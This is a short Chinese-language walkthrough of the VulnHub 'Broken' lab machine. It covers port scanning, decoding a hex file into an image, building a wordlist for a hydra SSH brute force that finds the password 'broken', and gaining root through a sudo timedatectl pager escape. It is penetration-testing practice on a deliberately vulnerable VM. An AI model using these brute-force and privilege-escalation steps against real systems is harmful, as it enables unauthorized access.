一、靶机信息收集
1、靶机下载地址
https://download.vulnhub.com/broken/Broken.7z
2、靶机IP扫描
3、探测靶机主机、端口、服务
nmap -sS -sV -A -p- 192.168.31.157
4、对靶机进行目录扫描
没什么发现
二、web渗透测试
1、访问靶机IP
2、发现readme.md 中是十六进制的值
将内容写入readme.md中,使用 xxd 转换
xxd -r -ps readme.md > readme.bin
注意下载xxd的时候会报错
apt-get update
apt-get install vim-common
apt install xxd
按照顺序下载
3、查看文件,发现文件头为 JFIF ,是一张图片
4、将后缀修改为 jpg ,查看图片
5、是一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh
Bob
BROKEN
avrahamcohen.ac
broken
6、使用 hydra 进行爆破
账户和密码都是:broken
7、进行ssh连接
成功连接
三、提权
1、查看当前权限
看到 timedatectl 可以执行root权限,执行命令,提权成功
sudo timedatectl list-timezones
!/bin/bash
提权成功!!!